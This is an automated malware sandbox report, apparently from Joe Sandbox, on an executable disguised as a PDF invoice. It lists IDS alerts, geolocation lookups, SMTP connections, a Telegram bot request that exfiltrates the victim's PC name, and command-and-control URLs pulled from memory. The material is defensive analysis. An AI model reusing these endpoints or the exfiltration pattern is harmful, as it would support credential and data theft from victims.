                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2017/10/2024%20/%2007:24:17%0D%0ACountry%20Name:%20%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49762 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49776 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49774 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49751 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49765 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49775 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49772 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.4:49787 -> 208.91.199.223:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49760 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2017/10/2024%20/%2007:24:17%0D%0ACountry%20Name:%20%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 17 Oct 2024 07:44:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4192935936.0000000006080000.00000004.00000020.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4192502862.00000000061D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000A.00000002.1812624704.000000000254A000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1772870272.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com51e
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
